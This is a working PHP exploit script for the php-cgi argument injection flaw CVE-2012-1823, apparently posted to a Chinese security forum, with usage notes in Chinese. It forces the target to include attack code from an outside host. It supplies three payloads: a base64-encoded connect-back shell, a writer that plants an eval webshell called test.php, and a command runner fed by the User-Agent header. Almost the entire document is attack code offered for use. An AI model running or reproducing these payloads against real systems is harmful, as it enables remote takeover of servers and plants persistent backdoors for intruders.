<?php
/*
*PHP CGI Argument Injection Exploit CVE-2012-1823
*by:cfking
*bbs:www.90sec.org
*/
set_time_limit(0);
$help='
[>] php-cgi Remote code Execution Exploit CVE-2012-1823
[>] by:cfking@90sec.org
[>] Usage: php '.$argv[0].' host index.php <1/2/3> <ip/Command> <port>
[>] Example: php '.$argv[0].' 127.0.0.1 / 2
';
if($argc<4)exit($help);
print_r ('
[>] PHP CGI Argument Injection Exploit CVE-2012-1823
[>] by:cfking@90sec.org');
$host=$argv[1];
$filename=$argv[2];
if($argv[3]=='1'){
$port=$argv[5]? $argv[5]:4444;
if(!$argv[4])exit("\n[-] Please enter IP and PORT\n");
print "\n[+] Bindshell IP $argv[4] PORT $port\n";
$payload=$argv[4].':'.$port;
$target='http://www.cj360.cn/plus/cmd.php';
}
if($argv[3]=='2'){
print "\n[+] Upload backdoor test.php\n";
$payload='';
$target='http://www.cj360.cn/plus/cmd.txt';
}
if($argv[3]=='3'){
if(!$argv[4])exit("\n[-] Please enter Command\n");
print "\n[+] Command $argv[4]\n";
$payload=$argv[4];
$target='http://www.cj360.cn/plus/cmds.txt';
}
ob_start();
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /$filename?-d+allow_url_include%3don+-d+auto_prepend_file%3d$target+-d+disable_functions%3doff HTTP/1.1\r\n");
fwrite($sock, "User-Agent: $payload\r\n");
fwrite($sock, "Host: $host\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
echo $body;
ob_end_flush();
?>
都是调用的远程代码 貌似php://input 会导致500错误 所以就用直接用远程包含了
<1/2/3> <ip/Command> <port> 参数说明
1 表示反弹一个cmdshell回来 所有面需要写 IP 以及端口
2 表示直接上传一个一句话 密码为cmd 在当前目录下文件名是test.php
3 表示执行系统命令 所以需要再加上一个参数 就是命令咯
哦对了我这里是用的远程包含的方式执行的这些功能所以默认的话我用一个shell上传的各种脚本
我也一起打包发上来吧 大家可以自己修改代码里面的URI
Bindshell 的接口:
<?php $target='PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRhcnJheT1leHBsb2RlKCc6JywkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOyRpcCA9ICRhcnJheVswXTskcG9ydCA9ICRhcnJheVsxXTskaXBmID0gQUZfSU5FVDtpZiAoRkFMU0UgIT09IHN0cnBvcygkaXAsICI6IikpIHsJJGlwID0gIlsiLiAkaXAgLiJdIjsJJGlwZiA9IEFGX0lORVQ2O31pZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsJJHNfdHlwZSA9ICdzdHJlYW0nO30gZWxzZWlmICgoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoJGlwLCAkcG9ydCk7CSRzX3R5cGUgPSAnc3RyZWFtJzt9IGVsc2VpZiAoKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsJJHMgPSAkZigkaXBmLCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7CSRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOwlpZiAoISRyZXMpIHsgZGllKCk7IH0JJHNfdHlwZSA9ICdzb2NrZXQnO30gZWxzZSB7CWRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7fWlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfXN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhaztjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazt9aWYgKCEkbGVuKSB7CWRpZSgpO30kYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOyRsZW4gPSAkYVsnbGVuJ107JGIgPSAnJzt3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsJc3dpdGNoICgkc190eXBlKSB7IAljYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CWNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsJfX0kR0xPQkFMU1snbXNnc29jayddID0gJHM7JEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTtldmFsKCRiKTtkaWUoKTsgZXhpdDs/Pg=='; echo $code=base64_decode($target); ?>
这个大家可以base64解密后直接保存txt
写入一句话webshell的接口:
<?php
$file = fopen("test.php","w");
fwrite($file,'<?php eval($_POST[\'cmd\'])?>');
fclose($file);
echo "webshell Write successful";
exit;
?>
命令执行的接口:
<?php system($_SERVER["HTTP_USER_AGENT"]); exit; ?>